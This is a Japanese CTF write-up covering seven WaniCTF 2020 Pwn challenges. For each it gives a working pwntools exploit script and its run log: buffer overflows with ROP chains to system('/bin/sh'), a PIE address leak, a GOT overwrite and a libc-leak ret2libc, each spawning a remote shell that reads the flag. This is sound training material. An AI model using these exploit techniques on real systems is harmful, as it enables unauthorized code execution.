WaniCTF 2020 Writeup

[Pwn] netcat

f:id:m412u:20201129093431p:plain
netcat

実行結果

m412u@ubuntu:~/CTF/wanictf/netcat$ nc netcat.wanictf.org 9001
congratulation!
ls -al
total 28
drwxr-xr-x 1 root pwn  4096 Nov 13 07:35 .
drwxr-xr-x 1 root root 4096 Nov 13 07:35 ..
-r-xr-x--- 1 root pwn  8656 Nov 13 07:34 chall
-r--r----- 1 root pwn    33 Nov 13 07:34 flag.txt
-r-xr-x--- 1 root pwn    35 Nov 13 07:34 redir.sh
cat flag.txt
FLAG{netcat-1s-sw1ss-4rmy-kn1fe}
^C
m412u@ubuntu:~/CTF/wanictf/netcat$ 

[Pwn] var rewrite

f:id:m412u:20201129094012p:plain
var rewrite

exploit

from pwn import *
from sys import argv
from time import sleep

#context.log_level = "debug"

binfile = "./pwn02"

# Load the target. pwntools logs the checksec summary when the ELF is parsed
# (see the run log below: no stack canary, NX on, no PIE at 0x400000), which
# is what lets the script use fixed addresses; `elf` is not referenced again.
elf = ELF(binfile)

# Pick the target from argv[1]: "d" runs the binary locally under gdb with a
# breakpoint, "r" connects to the challenge server, anything else spawns a
# plain local process.
if len(argv) >= 2 and argv[1] == "d":
    p = gdb.debug(binfile, '''
        break *0x400964
        continue
    ''')
elif len(argv) >= 2 and argv[1] == "r":
    p = remote("var.wanictf.org", 9002)
else:
    p = process(binfile)

# Payload for the name prompt. Per the stack dump in the run log, 30 filler
# bytes reach the saved return address, and the four qwords after it form a
# chain that ends in system("/bin/sh"). The first slot (0x4006ce) is not
# commented by the author; the pwn07 script labels the corresponding slot a
# bare `ret`, presumably for stack alignment before the call -- confirm.
payload: bytes = b""
payload += b"A" * 30
payload += p64(0x4006ce)
payload += p64(0x400b43)    # pop rdi ; ret  ;  -- loads the next qword into rdi
payload += p64(0x400b74)    # /bin/sh  -- address of the string inside the no-PIE binary
payload += p64(0x400746)    # system@plt

# Wait for the prompt before sending. pwntools coerces the str pattern to
# bytes (newer releases warn about it; b"..." avoids that).
p.recvuntil("What's your name?: ")
p.sendline(payload)

# Hand the session over to the operator.
p.interactive()

実行結果

m412u@ubuntu:~/CTF/wanictf/var_rewrite$ python3 exp.py r
[*] '/home/m412u/CTF/wanictf/var_rewrite/pwn02'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to var.wanictf.org on port 9002: Done
[*] Switching to interactive mode
hello AAAAAAAAAAAAAAAAAA?!
target = AAAAAAAA?

***start stack dump***
0x7fff046e0f90: 0x00007fff046e0fb0 <- rsp
0x7fff046e0f98: 0x4141414141410790
0x7fff046e0fa0: 0x4141414141414141
0x7fff046e0fa8: 0x0000003f41414141
0x7fff046e0fb0: 0x4141414141414141 <- rbp
0x7fff046e0fb8: 0x00000000004006ce <- return address
***end stack dump***

$ ls -al
total 28
drwxr-xr-x 1 root pwn  4096 Nov 18 12:43 .
drwxr-xr-x 1 root root 4096 Nov 13 07:35 ..
-r-xr-x--- 1 root pwn  9072 Nov 18 12:43 chall
-r--r----- 1 root pwn    49 Nov 13 07:34 flag.txt
-r-xr-x--- 1 root pwn    35 Nov 13 07:34 redir.sh
$ cat flag.txt
FLAG{1ets-1earn-stack-w1th-b0f-var1ab1e-rewr1te}
$ exit
Segmentation fault (core dumped)
[*] Got EOF while reading in interactive
$ 
[*] Interrupted
m412u@ubuntu:~/CTF/wanictf/var_rewrite$ 

[Pwn] binsh address

f:id:m412u:20201129095059p:plain
binsh address

exploit

from pwn import *
from sys import argv
from time import sleep

#context.log_level = "debug"

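binfile = "./pwn03"

# Load the target. pwntools logs the checksec summary when the ELF is parsed
# (run log below: canary, NX, full RELRO and PIE are all enabled), so nothing
# in the binary sits at a fixed address and one has to be leaked first;
# `elf` is not used again.
elf = ELF(binfile)

# Pick the target from argv[1]: "d" = local under gdb, "r" = challenge
# server, otherwise a plain local process.
# NOTE(review): the gdb breakpoint 0x400964 is the same literal the pwn02
# script uses; with PIE enabled it is unlikely to be valid here -- confirm.
if len(argv) >= 2 and argv[1] == "d":
    p = gdb.debug(binfile, '''
        break *0x400964
        continue
    ''')
elif len(argv) >= 2 and argv[1] == "r":
    p = remote("var.wanictf.org", 9003)
else:
    p = process(binfile)

# The program prints the runtime address of its `input` buffer as "0x" plus
# 12 hex digits (14 bytes). Parse it with int(..., 16) instead of eval():
# eval() executes whatever bytes the peer sends, so a hostile or spoofed
# server could run code inside this client, whereas int() simply raises
# ValueError on anything that is not a hex number.
p.recvuntil("The address of \"input  \" is ")
input_addr = int(p.recv(14), 16)
log.info("input_addr: 0x{:08x}".format(input_addr))

# 0x2010 and 0x2020 are the author's offsets from the PIE image base to
# `input` and to the "/bin/sh" string for this particular binary; the run
# log shows the recovered base is page-aligned, as expected.
base_addr = input_addr - 0x2010
log.info("base_addr: 0x{:08x}".format(base_addr))
binsh_addr = base_addr + 0x2020
log.info("binsh_addr: 0x{:08x}".format(binsh_addr))

# The program asks for the "/bin/sh" address as hex text (see the run log).
p.sendline(hex(binsh_addr))

# Give the remote a moment to respond before switching to interactive mode.
sleep(0.5)

p.interactive()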

実行結果

m412u@ubuntu:~/CTF/wanictf/binsh_address$ python3 exp.py r
[*] '/home/m412u/CTF/wanictf/binsh_address/pwn03'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to var.wanictf.org on port 9003: Done
[*] input_addr: 0x557885c2b010
[*] base_addr: 0x557885c29000
[*] binsh_addr: 0x557885c2b020
[*] Switching to interactive mode
.
Please input "/bin/sh" address as a hex number: Your input address is 0x557885c2b020.
Congratulation!
$ ls -al
total 32
drwxr-xr-x 1 root pwn   4096 Nov 18 12:44 .
drwxr-xr-x 1 root root  4096 Nov 13 07:35 ..
-r-xr-x--- 1 root pwn  13176 Nov 18 12:44 chall
-r--r----- 1 root pwn     36 Nov 13 07:34 flag.txt
-r-xr-x--- 1 root pwn     35 Nov 13 07:34 redir.sh
$ cat flag.txt
FLAG{cAn-f1nd-str1ng-us1ng-str1ngs}
$ 
[*] Interrupted

[Pwn] got rewriter

f:id:m412u:20201129095237p:plain
got rewriter

exploit

from pwn import *
from sys import argv
from time import sleep

#context.log_level = "debug"

binfile = "./pwn04"

# Load the target. pwntools logs the checksec summary when the ELF is parsed
# (run log below: partial RELRO, i.e. a writable GOT, and no PIE at
# 0x400000); `elf` is not referenced again.
elf = ELF(binfile)

# Pick the target from argv[1]: "d" = local under gdb, "r" = challenge
# server, otherwise a plain local process.
# NOTE(review): breakpoint 0x400964 is the same literal as in the pwn02
# script -- confirm it is meaningful for pwn04.
if len(argv) >= 2 and argv[1] == "d":
    p = gdb.debug(binfile, '''
        break *0x400964
        continue
    ''')
elif len(argv) >= 2 and argv[1] == "r":
    p = remote("var.wanictf.org", 9004)
else:
    p = process(binfile)

# The program reads two values at ": " prompts and performs
# `*first <- second` (run log: "*0x601038 <- 0x400807."). Neither value is
# commented by the author; given the challenge name and the writable GOT,
# 0x601038 is presumably a GOT slot and 0x400807 a function inside the
# no-PIE binary -- confirm against the ELF.
p.recvuntil(": ")
p.sendline("0x601038")
p.recvuntil(": ")
p.sendline("0x400807")
# Brief pause so the program's output arrives before interactive mode.
sleep(0.5)

p.interactive()

実行結果

m412u@ubuntu:~/CTF/wanictf/got_rewriter$ python3 exp.py r
[*] '/home/m412u/CTF/wanictf/got_rewriter/pwn04'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to var.wanictf.org on port 9004: Done
[*] Switching to interactive mode
Your input rewrite value is 0x400807.

*0x601038 <- 0x400807.


congratulation!
$ ls -al
total 28
drwxr-xr-x 1 root pwn  4096 Nov 18 12:45 .
drwxr-xr-x 1 root root 4096 Nov 13 07:35 ..
-r-xr-x--- 1 root pwn  8864 Nov 18 12:43 chall
-r--r----- 1 root pwn    42 Nov 13 07:34 flag.txt
-r-xr-x--- 1 root pwn    35 Nov 13 07:34 redir.sh
$ cat flag.txt
FLAG{we-c4n-f1y-with-gl0b41-0ffset-tab1e}
$ 
[*] Interrupted
m412u@ubuntu:~/CTF/wanictf/got_rewriter$ 

[Pwn] ret rewrite

f:id:m412u:20201129095900p:plain
ret rewrite

exploit

from pwn import *
from sys import argv
from time import sleep

#context.log_level = "debug"

binfile = "./pwn05"

# Load the target. pwntools logs the checksec summary when the ELF is parsed
# (run log below: no canary, NX on, no PIE at 0x400000), which is why fixed
# addresses can be used; `elf` is not referenced again.
elf = ELF(binfile)

# Pick the target from argv[1]: "d" = local under gdb, "r" = challenge
# server, otherwise a plain local process.
# NOTE(review): breakpoint 0x400964 is the same literal as in the pwn02
# script -- confirm it is meaningful for pwn05.
if len(argv) >= 2 and argv[1] == "d":
    p = gdb.debug(binfile, '''
        break *0x400964
        continue
    ''')
elif len(argv) >= 2 and argv[1] == "r":
    p = remote("var.wanictf.org", 9005)
else:
    p = process(binfile)

# Payload for the name prompt. Per the stack dump in the run log, 22 filler
# bytes reach the saved return address at rbp+8; the four qwords after it
# form a chain that ends in system("/bin/sh"). The first slot (0x400696) is
# not commented by the author; the pwn07 script labels the corresponding
# slot a bare `ret`, presumably for stack alignment -- confirm.
payload: bytes = b""
payload += b"A" * 22
payload += p64(0x400696)
payload += p64(0x400ab3)    # pop rdi ; ret  ;  -- loads the next qword into rdi
payload += p64(0x400ae4)    # /bin/sh  -- address of the string inside the no-PIE binary
payload += p64(0x400700)    # system@plt

# Wait for the prompt before sending (str pattern is coerced to bytes).
p.recvuntil("What's your name?: ")
p.sendline(payload)

# Hand the session over to the operator.
p.interactive()

実行結果

m412u@ubuntu:~/CTF/wanictf/ret_rewriter$ python3 exp.py r
[*] '/home/m412u/CTF/wanictf/ret_rewriter/pwn05'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to var.wanictf.org on port 9005: Done
[*] Switching to interactive mode
Hello AAAAAAAAAA7!

***start stack dump***
0x7ffe6adafa30: 0x414141414141fb30 <- rsp
0x7ffe6adafa38: 0x0000003741414141
0x7ffe6adafa40: 0x4141414141414141 <- rbp
0x7ffe6adafa48: 0x0000000000400696 <- return address
0x7ffe6adafa50: 0x0000000000400ab3
0x7ffe6adafa58: 0x0000000000400ae4
0x7ffe6adafa60: 0x0000000000400700
***end stack dump***

$ ls -al
total 28
drwxr-xr-x 1 root pwn  4096 Nov 18 12:45 .
drwxr-xr-x 1 root root 4096 Nov 13 07:35 ..
-r-xr-x--- 1 root pwn  9024 Nov 18 12:43 chall
-r--r----- 1 root pwn    49 Nov 13 07:34 flag.txt
-r-xr-x--- 1 root pwn    35 Nov 13 07:34 redir.sh
$ cat flag.txt
FLAG{1earning-how-return-address-w0rks-on-st4ck}
$ 
[*] Interrupted
m412u@ubuntu:~/CTF/wanictf/ret_rewriter$ 

[Pwn] rop func call

f:id:m412u:20201129100245p:plain
rop func call

exploit

from pwn import *
from sys import argv
from time import sleep

#context.log_level = "debug"

binfile = "./pwn06"

# Load the target. pwntools logs the checksec summary when the ELF is parsed
# (run log below: no canary, NX on, no PIE at 0x400000); `elf` is not
# referenced again.
elf = ELF(binfile)

# Pick the target from argv[1]: "d" = local under gdb, "r" = challenge
# server, otherwise a plain local process. `follow-fork-mode parent` keeps
# gdb attached to the original process if the program forks (e.g. inside
# system()).
if len(argv) >= 2 and argv[1] == "d":
    p = gdb.debug(binfile, '''
        set follow-fork-mode parent
        break *0x400811
        break *0x400899
        continue
    ''')
elif len(argv) >= 2 and argv[1] == "r":
    p = remote("var.wanictf.org", 9006)
else:
    p = process(binfile)

# Payload for the name prompt. Per the stack dump in the run log, 22 filler
# bytes reach the saved return address; the four qwords after it form a
# chain ending in system("/bin/sh"). The first slot (0x40065e) is not
# commented by the author; the pwn07 script labels the corresponding slot a
# bare `ret`, presumably for stack alignment -- confirm. Unlike pwn02/pwn05,
# the "/bin/sh" address here is in the 0x601000 page (data/bss territory in
# a no-PIE binary), not in read-only data -- presumably the program itself
# places the string there; confirm.
payload: bytes = b""
payload += b"A" * 22
payload += p64(0x40065e)
payload += p64(0x400a53)    # pop rdi ; ret  ;  -- loads the next qword into rdi
payload += p64(0x601080)    # /bin/sh
payload += p64(0x4006C0)    # system@plt

# Wait for the prompt, pause briefly, then send.
p.recvuntil("What's your name?: ")
sleep(0.5)
p.sendline(payload)

# Hand the session over to the operator.
p.interactive()

実行結果

m412u@ubuntu:~/CTF/wanictf/rop_func_call$ python3 exp.py r
[*] '/home/m412u/CTF/wanictf/rop_func_call/pwn06'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to var.wanictf.org on port 9006: Done
[*] Switching to interactive mode
hello AAAAAAAAAA7!

***start stack dump***
0x7ffc7ad7fa10: 0x4141414141410000 <- rsp
0x7ffc7ad7fa18: 0x0000003741414141
0x7ffc7ad7fa20: 0x4141414141414141 <- rbp
0x7ffc7ad7fa28: 0x000000000040065e <- return address
0x7ffc7ad7fa30: 0x0000000000400a53
0x7ffc7ad7fa38: 0x0000000000601080
0x7ffc7ad7fa40: 0x00000000004006c0
***end stack dump***

$ ls -al
total 28
drwxr-xr-x 1 root pwn  4096 Nov 18 12:45 .
drwxr-xr-x 1 root root 4096 Nov 13 07:35 ..
-r-xr-x--- 1 root pwn  8992 Nov 18 12:43 chall
-r--r----- 1 root pwn    39 Nov 18 12:43 flag.txt
-r-xr-x--- 1 root pwn    35 Nov 13 07:34 redir.sh
$ cat flag.txt
FLAG{learning-rop-and-x64-system-call}
$ 
[*] Interrupted
m412u@ubuntu:~/CTF/wanictf/rop_func_call$ 

[Pwn] one gadget rce

f:id:m412u:20201129100739p:plain
one gadget rce

exploit

from pwn import *
from sys import argv

#context.log_level = "debug"

binary = "./pwn07"

# Load the target and the libc pwntools resolves for it. Both checksec
# summaries are logged on parse (run log below: the binary has no canary and
# no PIE; the locally resolved libc is libc-2.31.so). Neither object is used
# afterwards -- the libc offsets below are hard-coded.
elf = ELF(binary)
libc = elf.libc

# Offsets of puts, system and the "/bin/sh" string inside libc. These are
# constants of one specific libc build (the local libc-2.31 per the run
# log); the remote stage only works because the server ships the same build
# -- confirm before reuse. Despite the challenge name, no one_gadget is
# used: the second chain calls system("/bin/sh").
PUTS_OFF = 0x80aa0
SYSTEM_OFF = 0x4f550
BINSH_OFF = 0x1b3e1a

# Pick the target from argv[1]: "d" = local under gdb, "r" = challenge
# server, otherwise a plain local process.
# NOTE(review): the two breakpoints are the same literals as in the pwn06
# script -- confirm they match pwn07.
if len(argv) >= 2 and argv[1] == "d":
    p = gdb.debug(binary, '''
        set follow-fork-mode parent
        break *0x400811
        break *0x400899
        continue
    ''')
elif len(argv) >= 2 and argv[1] == "r":
    p = remote("rce.wanictf.org", 9007)
else:
    p = process(binary)

# Stage 1: leak the runtime address of puts. 22 filler bytes reach the saved
# return address (the author's value; the program's own stack dump, which
# the script consumes below, is where it can be checked). The chain calls
# puts(puts@got), printing the pointer stored in the GOT slot, and then
# returns into main so a second payload can be sent.
payload: bytes = b""
payload += b"A" * 22
payload += p64(0x400626)    # ret   ;  -- bare ret, presumably for stack alignment
payload += p64(0x400a13)    # pop rdi ; ret  ;
payload += p64(0x601020)    # puts@got  -- argument: address of the GOT slot
payload += p64(0x400650)    # puts@plt  -- prints the pointer stored in that slot
payload += p64(0x40085e)    # main_addr -- restart main for stage 2

p.recvuntil("What's your name?: ")
p.sendline(payload)
# Skip the program's stack dump so the next bytes received are the leak.
p.recvuntil("***end stack dump***\n\n")
# NOTE(review): `sleep` is not imported explicitly in this script; it must
# come from `from pwn import *` (the sibling scripts import it from `time`)
# -- confirm.
sleep(0.5)

# Leak of the puts GOT entry: puts stops at the first NUL byte, so a
# user-space pointer yields 6 significant bytes; pad to 8 and decode as
# little-endian.
puts_got = u64(p.recv(6)+b"\x00\x00")    # reshape the raw leak into a u64
log.info("puts_got: 0x{:08x}".format(puts_got))

# Recover the libc base address from the leaked puts address.
libc_base = puts_got - PUTS_OFF
log.info("libc_base: 0x{:08x}".format(libc_base))


# Stage 2: same overflow, now with libc addresses resolved.
system_addr = libc_base + SYSTEM_OFF
log.info("system_addr: 0x{:08x}".format(system_addr))
binsh_addr = libc_base + BINSH_OFF
log.info("binsh_addr: 0x{:08x}".format(binsh_addr))

payload2: bytes = b""
payload2 += b"A" * 22
payload2 += p64(0x400626)   # ret, as in stage 1
payload2 += p64(0x400a13)   # pop rdi ; ret
payload2 += p64(binsh_addr)  # "/bin/sh" inside libc
payload2 += p64(system_addr)  # system()

# Pause so main has restarted and is waiting at the prompt again.
sleep(1)
p.recvuntil("What's your name?: ")
p.sendline(payload2)
p.recvuntil("***end stack dump***\n\n")

# Hand the session over to the operator.
p.interactive()

実行結果

m412u@ubuntu:~/CTF/wanictf/one_gadget_rce$ python3 exp.py r
[*] '/home/m412u/CTF/wanictf/one_gadget_rce/pwn07'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/usr/lib/x86_64-linux-gnu/libc-2.31.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to rce.wanictf.org on port 9007: Done
[*] puts_got: 0x7f2d52157aa0
[*] libc_base: 0x7f2d520d7000
[*] system_addr: 0x7f2d52126550
[*] binsh_addr: 0x7f2d5228ae1a
[*] Switching to interactive mode
$ ls -al
total 28
drwxr-xr-x 1 root pwn  4096 Nov 18 12:45 .
drwxr-xr-x 1 root root 4096 Nov 13 07:35 ..
-r-xr-x--- 1 root pwn  8888 Nov 18 12:43 chall
-r--r----- 1 root pwn    43 Nov 18 12:43 flag.txt
-r-xr-x--- 1 root pwn    35 Nov 13 07:34 redir.sh
$ cat flag.txt
FLAG{mem0ry-1eak-4nd-0ne-gadget-rem0te-ce}
$ 
[*] Interrupted
m412u@ubuntu:~/CTF/wanictf/one_gadget_rce$